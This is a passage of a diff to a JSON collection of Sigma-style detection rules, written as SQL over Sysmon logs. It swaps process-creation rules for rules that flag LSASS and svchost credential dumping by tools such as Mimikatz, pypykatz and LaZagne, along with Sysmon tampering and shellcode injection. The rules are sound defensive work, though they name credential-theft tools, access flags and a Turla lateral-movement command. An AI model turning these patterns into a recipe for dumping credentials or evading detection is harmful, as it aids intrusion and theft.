"description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": 
[ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "title": "Potential NT API Stub Patching", 
+ "id": "b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE 
'%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management 
Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "status": "test", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + 
"attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 
'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess 
= '0x1fffff')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": 
"9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "System administrator Usage" + "False positives are present when looking for 0x1410. Exclusions may be required." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE 
'%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1047" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' 
OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", - "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1574" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": 
